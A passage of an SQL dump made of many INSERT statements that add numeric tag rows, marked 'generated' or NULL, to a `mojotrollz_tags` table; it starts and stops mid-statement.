VALUES (178003, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178003, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178004, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178004, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178004, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178004, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178005, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178005, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178005, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178005, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178006, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178006, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178006, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178006, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178007, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178007, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178007, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178007, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178008, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178008, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178008, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178008, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178009, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178009, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178009, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178009, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178010, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178010, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178010, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178010, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178011, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178011, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178011, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178011, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178012, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178012, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178012, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178012, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178013, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178013, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178013, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178013, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178014, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178014, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178014, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178014, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178015, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178015, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178015, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178015, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178016, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178016, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178016, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178016, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178017, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178017, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178017, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178017, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178018, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178019, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178020, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178021, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178022, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178023, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178024, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178025, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178026, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178027, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178028, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178029, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178030, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178031, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178032, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178033, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178034, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178035, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178036, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178037, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178038, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178039, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178040, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178041, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178042, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178043, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178044, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178045, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178046, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178047, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178048, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178084, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178085, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178087, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178089, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178090, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178104, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178105, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178106, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178107, 2, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178107, 2, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178107, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178107, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178108, 2, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178108, 2, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178108, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178108, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178125, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178144, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178145, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178146, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178147, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178164, 2, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178164, 2, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178164, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178164, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178184, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178185, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178186, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178187, 2, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178187, 2, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178187, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178187, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178189, 2, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178189, 2, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178189, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178189, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178190, 2, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178190, 2, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178190, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178190, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178191, 2, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178191, 2, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178191, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178191, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178192, 2, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178192, 2, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178192, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178192, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178193, 2, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178193, 2, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178193, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178193, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178194, 2, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178194, 2, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178194, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178194, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178195, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178204, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178224, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178226, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178244, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178246, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178247, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178264, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178265, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178304, 2, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178324, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178325, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178364, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178364, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178365, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178365, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178386, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178425, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178426, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178428, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178429, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178430, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178431, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178432, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178433, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178434, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178435, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178436, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178437, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178438, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178444, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178464, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178504, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178524, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178525, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178526, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178551, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178553, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178554, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178557, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178559, 2, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178559, 2, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178559, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178559, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178560, 2, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178560, 2, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178560, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178560, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178561, 2, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178561, 2, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178561, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178561, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178562, 2, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178562, 2, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178562, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178562, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178563, 2, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178563, 2, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178563, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178563, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178564, 2, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178564, 2, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178564, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178564, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178565, 2, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178565, 2, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178565, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178565, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178566, 2, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178566, 2, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178566, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178566, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178567, 2, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178567, 2, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178567, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178567, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178568, 2, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178568, 2, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178568, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178568, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178569, 2, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178569, 2, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178569, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178569, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178570, 2, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178570, 2, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178570, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178570, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178571, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178572, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178573, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178609, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178645, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178647, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178649, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178666, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (178667, 2, 1, 